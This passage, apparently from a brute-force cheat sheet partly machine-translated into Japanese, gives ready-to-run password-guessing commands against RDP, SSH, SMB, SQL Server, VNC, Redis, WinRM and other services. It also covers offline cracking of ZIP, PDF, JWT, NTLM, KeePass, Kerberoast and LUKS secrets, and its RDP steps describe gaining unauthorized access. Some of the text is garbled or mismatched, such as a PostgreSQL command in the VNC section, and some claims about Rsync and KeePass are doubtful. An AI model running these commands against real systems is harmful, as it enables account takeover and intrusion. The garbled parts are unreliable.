Configure the tool: Set the target IP address or hostname, specify the username and password lists, and configure any other necessary parameters.
-
Start the attack: Launch the brute force tool and let it run until it successfully cracks the RDP credentials.
-
Gain unauthorized access: Once the correct credentials are found, use them to gain unauthorized access to the target RDP server.
Mitigation Techniques
To protect against brute force attacks on RDP, consider implementing the following mitigation techniques:
-
Use strong and complex passwords: Enforce a password policy that requires users to create strong and unique passwords.
-
Implement account lockout policies: Set up account lockout policies that temporarily lock user accounts after a certain number of failed login attempts.
-
Enable network-level authentication (NLA): NLA requires users to authenticate before establishing an RDP session, adding an extra layer of security.
-
Limit RDP access: Restrict RDP access to only authorized users and IP addresses.
-
Monitor and log RDP activity: Regularly review RDP logs for any suspicious activity and take appropriate action if necessary.
By following these mitigation techniques, you can significantly reduce the risk of a successful brute force attack on RDP.
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
Redis
Redis(Remote Dictionary Server)は、高速でオープンソースのキーバリューストアです。Redisは、メモリ内でデータを保持するため、高速な読み書きアクセスが可能です。また、データの永続化もサポートしています。
ブルートフォース攻撃
ブルートフォース攻撃は、暗号化されたデータやパスワードを解読するために使用される攻撃手法です。この攻撃手法では、すべての可能な組み合わせを試行し、正しい組み合わせを見つけるまで続けます。
Redisに対するブルートフォース攻撃では、一連のパスワードを試行し、正しいパスワードを見つけることを目指します。攻撃者は、一般的なパスワードや辞書攻撃を使用して、パスワードを推測します。
ブルートフォース攻撃は、強力なパスワードポリシーが実装されていない場合や、弱いパスワードが使用されている場合に特に効果的です。攻撃者は、パスワードの推測に時間がかかる場合でも、自動化されたツールを使用して攻撃を行うことができます。
ブルートフォース攻撃の防止策
ブルートフォース攻撃からRedisを保護するためには、以下の対策を講じることが重要です。
- 強力なパスワードポリシーを実装する:長いパスワード、大文字と小文字の組み合わせ、数字や特殊文字の使用など、セキュリティを強化するための要件を設定します。
- パスワードの定期的な変更:定期的にパスワードを変更することで、攻撃者の攻撃を困難にします。
- ログイン試行回数の制限:ログイン試行回数を制限することで、ブルートフォース攻撃を防止します。
- IPアドレスの制限:特定のIPアドレスからのアクセスを制限することで、不正なアクセスを防止します。
- 2要素認証の使用:2要素認証を使用することで、追加のセキュリティレイヤーを提供します。
これらの対策を組み合わせることで、Redisへのブルートフォース攻撃を防止することができます。
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
Rexec
Rexec is a remote execution service that allows users to execute commands on a remote system. It is commonly used for administrative purposes, such as managing multiple servers or performing system maintenance tasks.
One common method of brute-forcing Rexec is by attempting to guess the username and password combination. This can be done by using a list of commonly used usernames and passwords, or by using a dictionary attack where a list of words is used as potential passwords.
Another method is to use a brute-force tool that automatically generates and tries different combinations of usernames and passwords. These tools can be configured to use different variations of usernames and passwords, such as adding numbers or special characters.
It is important to note that brute-forcing Rexec is a time-consuming process and may not always be successful. Additionally, it is considered unethical and illegal to attempt to brute-force a system without proper authorization.
To protect against brute-force attacks, it is recommended to use strong and unique passwords, implement account lockout policies, and monitor for suspicious login attempts.
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
Rlogin
Rlogin is a remote login protocol that allows users to log into a remote system over a network. It is commonly used in Unix-based systems.
Brute forcing Rlogin involves systematically trying different username and password combinations until the correct credentials are found. This can be done using automated tools or scripts that iterate through a list of common usernames and passwords.
It is important to note that brute forcing is an aggressive and potentially illegal hacking technique. It is recommended to only use this technique with proper authorization and for legitimate purposes, such as penetration testing.
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
Rsh
Rsh (Remote Shell) is a network protocol that allows users to execute commands on a remote system. It is commonly used for remote administration tasks. However, it is important to note that Rsh is considered insecure due to its lack of encryption and authentication mechanisms.
One common brute-force attack method against Rsh is to systematically try different username and password combinations until a successful login is achieved. This can be done using automated tools such as Hydra or Medusa.
To protect against brute-force attacks on Rsh, it is recommended to disable or restrict access to the Rsh service. Additionally, implementing strong authentication mechanisms, such as using SSH (Secure Shell) instead of Rsh, is highly recommended.
Remember, always obtain proper authorization before attempting any hacking techniques. Hacking without permission is illegal and unethical.
hydra -L <Username_list> rsh://<Victim_IP> -v -V
http://pentestmonkey.net/tools/misc/rsh-grind
Rsync
Rsyncは、ファイル転送と同期のための強力なツールです。このツールは、ローカルマシンとリモートマシン間でファイルを転送するために使用されます。Rsyncは、差分転送をサポートしており、変更された部分のみを転送することができます。これにより、大量のデータを効率的に転送することができます。
Rsyncは、SSHプロトコルを使用してファイルを転送するため、セキュリティが確保されています。また、転送中に途中でエラーが発生した場合でも、再開することができます。
Rsyncは、ブルートフォース攻撃に対して脆弱性を持っています。ブルートフォース攻撃は、すべての可能なパスワードの組み合わせを試すことで、正しいパスワードを見つける攻撃手法です。Rsyncでは、パスワード認証を使用している場合、ブルートフォース攻撃に対して脆弱性があります。
Rsyncのブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実装し、パスワードの長さと複雑さを確保する必要があります。また、パスワード認証の代わりに公開鍵認証を使用することも推奨されます。公開鍵認証は、秘密鍵と公開鍵のペアを使用して認証を行うため、ブルートフォース攻撃に対してより安全です。
Rsyncのセキュリティを向上させるためには、最新のバージョンを使用し、セキュリティパッチを適用することも重要です。また、ファイアウォールやイントラusion detection system(IDS)などのセキュリティ対策も有効です。
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
RTSP
RTSP(Real Time Streaming Protocol)は、ストリーミングメディアを配信するためのプロトコルです。RTSPは、クライアントとサーバー間でメディアの制御情報をやり取りするために使用されます。RTSPは、リアルタイムのビデオやオーディオのストリームを効率的に転送するために設計されています。
RTSPの攻撃には、ブルートフォース攻撃が使用されることがあります。ブルートフォース攻撃は、辞書やランダムなパスワードの組み合わせを試し、正しいパスワードを見つけることを試みます。攻撃者は、RTSPサーバーに対して大量のパスワードを試すことで、不正アクセスを試みることができます。
ブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実装し、パスワードの複雑さを確保する必要があります。また、アカウントロックアウト機能を有効にすることも重要です。これにより、一定回数の誤ったパスワード試行後にアカウントがロックされるため、攻撃者のブルートフォース攻撃を防ぐことができます。
さらに、セキュリティパッチの適用や不要なサービスの無効化など、サーバーのセキュリティを強化することも重要です。これにより、攻撃者がサーバーにアクセスするための脆弱性を減らすことができます。
RTSPサーバーのセキュリティを確保するためには、定期的なペネトレーションテストを実施することもおすすめです。これにより、システムの脆弱性を特定し、適切な対策を講じることができます。
hydra -l root -P passwords.txt <IP> rtsp
SNMP
SNMP(Simple Network Management Protocol)は、ネットワークデバイスの管理と監視に使用されるプロトコルです。SNMPは、ネットワーク上のデバイスの情報を収集し、設定を変更するために使用されます。SNMPは、エージェントとマネージャの間で情報を交換するために使用されます。
SNMPは、デバイスの情報を取得するために、ブルートフォース攻撃の一部として使用されることがあります。ブルートフォース攻撃では、辞書やパスワードリストを使用して、デバイスのコミュニティストリング(SNMPの認証情報)を推測しようとします。
ブルートフォース攻撃は、自動化されたツールを使用して行われることが一般的です。これらのツールは、辞書やパスワードリストを使用して、可能なすべてのコミュニティストリングの組み合わせを試します。攻撃者は、正しいコミュニティストリングを見つけることで、デバイスにアクセスし、機密情報を取得することができます。
SNMPブルートフォース攻撃を防ぐためには、強力なコミュニティストリングを使用することが重要です。また、デバイスのSNMP設定を適切に構成し、不正なアクセスを防ぐためにファイアウォールやアクセス制御リスト(ACL)を使用することも推奨されます。
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
SMB
SMB(Server Message Block)は、ネットワーク上でファイル共有やリソース共有を行うためのプロトコルです。SMBは、Windowsオペレーティングシステムで広く使用されており、ファイルやプリンターなどのリソースをネットワーク上で共有するための機能を提供します。
SMBのブルートフォース攻撃は、辞書攻撃の一種であり、ユーザー名とパスワードの組み合わせを総当たりで試行し、正しい認証情報を見つけることを目指します。この攻撃は、弱いパスワードを使用しているユーザーアカウントを特定するために使用されます。
ブルートフォース攻撃は、自動化ツールを使用して実行することができます。これにより、大量のユーザー名とパスワードの組み合わせを高速で試行することができます。攻撃者は、一般的なパスワードや辞書攻撃によって成功する可能性が高いパスワードを使用しているユーザーアカウントを特定することができます。
SMBのブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実施し、パスワードの複雑さを強化する必要があります。また、アカウントロックアウトポリシーを設定することで、一定回数の認証失敗後にアカウントをロックすることも有効です。さらに、マルウェアや不正アクセスを検知するためのセキュリティソリューションの導入も重要です。
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
SMTP(Simple Mail Transfer Protocol)は、電子メールの送信に使用されるプロトコルです。SMTPサーバーに接続し、メールを送信するために必要な情報を提供します。SMTPは、メールアドレスの確認、メールの送信、メールの受信など、さまざまな操作を実行するために使用されます。
SMTPのブルートフォース攻撃は、辞書攻撃とも呼ばれ、SMTPサーバーに対して総当たり攻撃を行います。攻撃者は、ユーザー名とパスワードの組み合わせを試行し、正しい組み合わせを見つけることを目指します。この攻撃は、弱いパスワードを使用しているユーザーアカウントを特定するために使用されます。
ブルートフォース攻撃は、自動化されたツールを使用して行われることが一般的です。攻撃者は、辞書ファイルや一般的なパスワードのリストを使用して、大量の組み合わせを試行します。また、攻撃者は、パスワードの長さや文字セットなどのパラメータを調整することもできます。
ブルートフォース攻撃は、セキュリティ上の脆弱性を悪用するため、防御策が重要です。パスワードポリシーの強化、アカウントロックアウトの実装、二要素認証の導入など、さまざまな対策があります。また、ログ監視や異常検知システムの導入も有効です。
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
SOCKSは、ネットワークプロトコルであり、プロキシサーバーを介してTCP/IP接続を確立するために使用されます。 SOCKSプロトコルは、クライアントとサーバーの間でデータを中継するために使用されます。 SOCKSプロキシは、ユーザーのIPアドレスを隠すために使用されることがあります。 SOCKSプロキシを使用すると、ユーザーは自分のIPアドレスを隠すことができ、ウェブサイトやアプリケーションに匿名でアクセスすることができます。
SOCKSプロキシをハッキングに使用する場合、ブルートフォース攻撃は一般的な手法です。ブルートフォース攻撃は、すべての可能な組み合わせを試し、正しいパスワードを見つけることを試みます。 SOCKSプロキシに対してブルートフォース攻撃を行う場合、ハッカーは一連のパスワードを試し、正しいパスワードを見つけるまで続けます。この攻撃は時間がかかる場合がありますが、正しいパスワードが見つかると、ハッカーはプロキシサーバーにアクセスできるようになります。
ブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実装することが重要です。また、アカウントロックアウトやログイン試行回数の制限などのセキュリティメカニズムを使用することも推奨されます。さらに、二要素認証やIP制限などの追加のセキュリティレイヤーを使用することも有効です。
ブルートフォース攻撃は、ハッカーがアカウントのパスワードを特定するための効果的な手法ですが、適切なセキュリティ対策を実施することで防ぐことができます。
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
SSH
SSH(Secure Shell)は、ネットワーク上で安全なリモートアクセスを提供するプロトコルです。SSHを使用すると、暗号化されたトンネルを介してリモートサーバーに接続し、コマンドを実行したりファイルを転送したりすることができます。
SSHのブルートフォース攻撃は、辞書攻撃とも呼ばれ、SSHサーバーへの不正アクセスを試みる手法です。攻撃者は、一連のパスワードを試し、正しいパスワードを見つけることを目指します。
SSHブルートフォース攻撃を防ぐためには、以下の対策を講じることが重要です。
- 強力なパスワードポリシーを実施する:長さ、複雑さ、一意性の要件を設定し、定期的なパスワードの変更を促す。
- ログイン試行回数の制限:一定の時間内に許可されるログイン試行回数を制限する。
- パスワード認証の無効化:公開鍵認証を使用してSSH接続を設定し、パスワード認証を無効にする。
- ネットワークレベルのセキュリティ:SSHサーバーへのアクセスを制限するために、ファイアウォールやネットワークセグメンテーションを使用する。
SSHブルートフォース攻撃は、セキュリティ上の脅威となる可能性があるため、適切な対策を講じることが重要です。
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
弱いSSHキー/Debianの予測可能なPRNG
一部のシステムでは、暗号化素材を生成するために使用されるランダムシードに既知の欠陥があります。これにより、キースペースが劇的に減少し、snowdroppe/ssh-keybruteなどのツールでブルートフォース攻撃が可能になります。また、g0tmi1k/debian-sshのような弱いキーの事前生成セットも利用可能です。
SQL Server
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
Telnet
Telnetは、ネットワーク上のリモートコンピュータに接続するためのプロトコルです。このプロトコルを使用すると、リモートコンピュータにログインし、コマンドを実行することができます。Telnetは、ユーザー名とパスワードを使用して認証するため、セキュリティ上のリスクがあります。そのため、Telnetを使用する際には注意が必要です。
Telnetのブルートフォース攻撃は、辞書攻撃と同様の手法を使用して、ユーザー名とパスワードの組み合わせを総当たりで試行します。攻撃者は、一連の一般的なユーザー名とパスワードを使用して、リモートコンピュータにログインを試みます。この攻撃は、弱いパスワードを使用しているユーザーに対して効果的です。
Telnetのブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実施し、ユーザーに強力なパスワードの使用を促す必要があります。また、Telnetの代わりによりセキュアなプロトコル(例:SSH)を使用することも推奨されます。
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
VNC
VNC(Virtual Network Computing)は、リモートデスクトッププロトコル(RDP)の一種であり、リモートマシンへのアクセスを提供します。VNCは、クライアントとサーバーの間でデスクトップ画面を共有するために使用されます。
VNCのブルートフォース攻撃は、パスワードの推測を行い、正しいパスワードを見つけることを試みます。これにより、攻撃者は不正なアクセスを取得し、リモートマシンを制御することができます。
ブルートフォース攻撃は、一般的に辞書攻撃と呼ばれる方法で実行されます。攻撃者は、事前に作成されたパスワードリストを使用して、すべての可能な組み合わせを試します。これにより、正しいパスワードが見つかるまで繰り返し試行することができます。
VNCのブルートフォース攻撃は、強力なパスワードポリシーが実装されていない場合に特に効果的です。攻撃者は、短いパスワードや一般的な単語の使用など、弱いパスワードを推測することができます。
VNCのブルートフォース攻撃を防ぐためには、強力なパスワードポリシーを実装し、パスワードの長さと複雑さを増やすことが重要です。また、アカウントロックアウト機能を有効にすることも推奨されます。これにより、一定回数の誤ったパスワード試行後にアカウントがロックアウトされ、攻撃者の試行を制限することができます。
さらに、VNCのブルートフォース攻撃を検出するためには、ログイン試行の監視と異常なアクティビティの検出を行うセキュリティツールの使用が重要です。これにより、異常なパターンや大量のログイン試行が検出され、攻撃が早期に検知される可能性が高まります。
VNCのブルートフォース攻撃は、セキュリティ上の脆弱性を悪用するため、適切な対策を講じることが重要です。
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
Winrm
Winrmは、Windowsリモート管理(WinRM)プロトコルを使用して、リモートでWindowsマシンを管理するためのサービスです。WinRMは、Windows PowerShellや他のリモート管理ツールを使用して、リモートマシンにコマンドを実行したり、設定を変更したりするために使用されます。
Winrmは、デフォルトで有効になっている場合がありますが、一部の環境では手動で有効化する必要があります。Winrmを使用するためには、Winrmサービスが実行されていることを確認し、適切なセキュリティ設定が行われていることが重要です。
Winrmは、ブルートフォース攻撃の標的になる可能性があります。ブルートフォース攻撃は、辞書攻撃や総当たり攻撃などの手法を使用して、パスワードを推測することを試みます。Winrmのセキュリティを強化するためには、強力なパスワードポリシーを実装し、アカウントロックアウトポリシーを設定することが重要です。
また、Winrmのポート(デフォルトでは5985)を適切に制限することも重要です。不要なポートを閉じることで、攻撃者のアクセスを制限することができます。
Winrmのセキュリティを確保するためには、定期的なパスワード変更やマルウェア対策ソフトウェアの使用も推奨されます。さらに、ログイン試行の監視やログの分析を行うことで、不正アクセスの検出と対応が可能となります。
Winrmのセキュリティを確保するためには、最新のセキュリティパッチやアップデートを適用することも重要です。セキュリティの脆弱性が修正された最新のバージョンを使用することで、攻撃リスクを最小限に抑えることができます。
以上がWinrmに関する情報です。Winrmのセキュリティを確保するためには、適切な対策を講じることが重要です。
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化することができます。
今すぐアクセスを取得してください:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
ローカル
オンラインクラッキングデータベース
http://hashtoolkit.com/reverse-hash?(MD5 & SHA1)- https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value)
- https://www.onlinehashcrack.com/ (ハッシュ、WPA2キャプチャ、およびMSOffice、ZIP、PDFのアーカイブ...)
- https://crackstation.net/ (ハッシュ)
- https://md5decrypt.net/ (MD5)
- https://gpuhash.me/ (ハッシュとファイルハッシュ)
- https://hashes.org/search.php (ハッシュ)
- https://www.cmd5.org/ (ハッシュ)
- https://hashkiller.co.uk/Cracker (MD5、NTLM、SHA1、MySQL5、SHA256、SHA512)
- https://www.md5online.org/md5-decrypt.html (MD5)
- http://reverse-hash-lookup.online-domain-tools.com/
ハッシュをブルートフォース攻撃する前に、これをチェックしてください。
ZIP
#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
zip2john file.zip > zip.john
john zip.john
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
既知の平文zip攻撃
暗号化されたzip内のファイルの平文(または平文の一部)を知る必要があります。暗号化されたzip内のファイルのファイル名とサイズを確認するには、**7z l encrypted.zip
**を実行します。
bkcrack をリリースページからダウンロードしてください。
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password
7z
7zは、高い圧縮率を持つオープンソースのファイルアーカイバです。7zファイルは、他のファイルアーカイブ形式よりも小さくなる傾向があります。この形式は、7-Zipソフトウェアによって作成および解凍することができます。
7zファイルのパスワードを解読するために、ブルートフォース攻撃を使用することができます。ブルートフォース攻撃は、すべての可能なパスワードの組み合わせを試すことで、正しいパスワードを見つける手法です。
ブルートフォース攻撃は非常に時間がかかる場合がありますが、パスワードが弱い場合や短い場合には効果的です。ただし、強力なパスワードを使用している場合や、パスワードがランダムな場合には、ブルートフォース攻撃は非現実的な方法となる可能性があります。
ブルートフォース攻撃を実行するためには、専用のツールやスクリプトを使用することが一般的です。これらのツールは、自動的にパスワードの組み合わせを生成し、7zファイルに対して試行します。攻撃者は、パスワードが見つかるまでツールを実行し続けることができます。
ブルートフォース攻撃は、合法的なセキュリティテストやパスワードの回復などの目的で使用されることもありますが、不正な目的で使用することは違法です。適切な許可を得ずにブルートフォース攻撃を実行することは、法的な問題を引き起こす可能性があります。
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
ブルートフォース攻撃
ブルートフォース攻撃は、パスワードや暗号鍵を推測するために、すべての可能な組み合わせを試す攻撃手法です。この攻撃は、パスワードの弱さや予測可能性をテストするために使用されます。
ブルートフォース攻撃の手法
-
辞書攻撃:事前に作成された辞書ファイルを使用して、一連の単語やフレーズを試す方法です。この攻撃は、一般的なパスワードや一般的なフレーズに対して効果的です。
-
総当たり攻撃:すべての可能な組み合わせを順番に試す方法です。この攻撃は、パスワードの長さや文字セットが限られている場合に有効です。
-
ハイブリッド攻撃:辞書攻撃と総当たり攻撃を組み合わせた攻撃手法です。まず辞書攻撃を試し、成功しない場合に総当たり攻撃を行います。
ブルートフォース攻撃のツール
-
Hydra:多くのプロトコル(SSH、FTP、Telnetなど)に対してブルートフォース攻撃を実行するためのツールです。
-
Medusa:SSH、Telnet、FTP、HTTPなどのプロトコルに対してブルートフォース攻撃を行うための高速で柔軟なツールです。
-
John the Ripper:パスワードのハッシュを解読するための強力なツールで、ブルートフォース攻撃にも使用できます。
ブルートフォース攻撃の対策
-
強力なパスワードポリシーの実施:長さ、複雑さ、一意性などの要件を満たすパスワードポリシーを設定します。
-
二要素認証の使用:パスワードに加えて、追加の認証要素(SMSコード、ワンタイムパスワードなど)を要求します。
-
ロックアウトポリシーの設定:一定回数の認証失敗後にアカウントをロックするポリシーを設定します。
-
ログ監視とアラート:異常なアクティビティを監視し、ブルートフォース攻撃の試行を検出するためのログ監視とアラートシステムを導入します。
-
CAPTCHAの使用:自動化されたブルートフォース攻撃を防ぐために、CAPTCHAを使用します。
まとめ
ブルートフォース攻撃は、パスワードや暗号鍵を推測するために使用される攻撃手法です。辞書攻撃、総当たり攻撃、ハイブリッド攻撃などの手法があります。対策としては、強力なパスワードポリシーの実施、二要素認証の使用、ロックアウトポリシーの設定、ログ監視とアラート、CAPTCHAの使用などがあります。
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
PDFオーナーパスワード
PDFオーナーパスワードをクラックするには、次を参照してください:https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/
JWT
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
NTLM クラッキング
NTLM クラッキングは、Windows ベースのシステムで使用される認証プロトコルである NTLM のパスワードを解読する手法です。NTLM ハッシュを取得するために、パスワードのハッシュを総当たり攻撃することが一般的です。
NTLM クラッキングには、以下の手法があります。
-
辞書攻撃: 事前に作成されたパスワードリストを使用して、ユーザーのパスワードを総当たりで試行します。一般的なパスワードや一般的な単語の組み合わせを試すことが多いです。
-
ブルートフォース攻撃: パスワードの全ての組み合わせを試行する手法です。この手法は非常に時間がかかるため、効率的なツールや高性能なハードウェアが必要です。
-
ハイブリッド攻撃: 辞書攻撃とブルートフォース攻撃を組み合わせた手法です。まず辞書攻撃を試みて、成功しなかった場合にはブルートフォース攻撃に移行します。
NTLM クラッキングは、強力なパスワードポリシーが適用されていない場合や、ユーザーが弱いパスワードを使用している場合に特に有効です。ただし、クラッキングには時間がかかるため、パスワードが十分に強力であれば解読が困難になります。
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Keepass
Keepassは、パスワード管理ツールであり、Brute Force攻撃に対して強力なセキュリティを提供します。Brute Force攻撃は、すべての可能な組み合わせを試すことでパスワードを解読しようとする攻撃手法です。
Keepassは、パスワードデータベースを作成し、強力なマスターパスワードで保護します。このマスターパスワードは、Brute Force攻撃に対して非常に耐性があります。また、Keepassは、パスワードデータベースの暗号化にも使用される強力な暗号アルゴリズムをサポートしています。
Brute Force攻撃を防ぐために、Keepassはデフォルトで自動的に一定の時間の間隔を空けてパスワードの試行回数を制限します。これにより、攻撃者が大量のパスワードを試すことを防ぎます。
Keepassは、さまざまなプラットフォームで利用できるため、さまざまなデバイスでパスワードを安全に管理することができます。また、Keepassは、パスワード生成機能も提供しており、ランダムで強力なパスワードを生成することができます。
Keepassは、パスワード管理のセキュリティを向上させるための重要なツールであり、Brute Force攻撃からの保護を強化するために使用されます。
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ケベロースティング
Keberoastingは、Active Directory(AD)環境で使用されるサービスアカウントのパスワードを解読するための攻撃手法です。この攻撃は、Kerberos認証プロトコルの脆弱性を利用しています。
攻撃者は、AD環境内のサービスアカウントのユーザー名を特定し、そのユーザー名を使用してKerberosチケットを要求します。次に、攻撃者は取得したチケットをオフラインで解析し、サービスアカウントのパスワードを特定します。
Keberoasting攻撃は、サービスアカウントがKerberosサービスチケットを要求する際に使用するサービスプリンシパル名(SPN)の脆弱性に基づいています。攻撃者は、SPNがRC4暗号化で保護されている場合、その暗号化を解読することでパスワードを取得します。
この攻撃手法を防ぐためには、AD環境内のサービスアカウントのパスワードを強力なものに設定し、暗号化アルゴリズムをより強力なものに変更する必要があります。また、サービスアカウントのSPNを定期的に監視し、不正なアクティビティを検出することも重要です。
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
ラックスイメージ
方法1
インストール: https://github.com/glv2/bruteforce-luks
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
メソッド2
Brute force is a common method used to crack passwords or encryption keys by systematically trying all possible combinations until the correct one is found. It is a time-consuming process that requires a lot of computational power, but it can be effective if the password or encryption key is weak or if the attacker has access to a large amount of computing resources.
To perform a brute force attack, the attacker needs a list of possible passwords or encryption keys to try. This list can be generated using various techniques, such as using a dictionary of common passwords, using a list of previously leaked passwords, or using a combination of characters and symbols.
Once the list of possible passwords or encryption keys is obtained, the attacker uses a program or script to systematically try each combination until the correct one is found. This process can take a long time, especially if the password or encryption key is complex and the list of possible combinations is large.
To speed up the brute force attack, attackers can use techniques such as parallel processing, where multiple computing resources are used simultaneously to try different combinations. They can also use specialized hardware, such as graphics processing units (GPUs), which are designed to perform calculations quickly and efficiently.
It is important to note that brute force attacks are not always successful, especially if the password or encryption key is strong and the attacker does not have access to a large amount of computing resources. However, they can still be a viable option in certain scenarios, particularly when other methods of cracking passwords or encryption keys have failed.
In order to protect against brute force attacks, it is important to use strong and unique passwords or encryption keys. Additionally, implementing measures such as account lockouts or rate limiting can help prevent attackers from trying an unlimited number of combinations in a short period of time.
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
別のLuks BFチュートリアル:http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1
Mysql
#John hash format
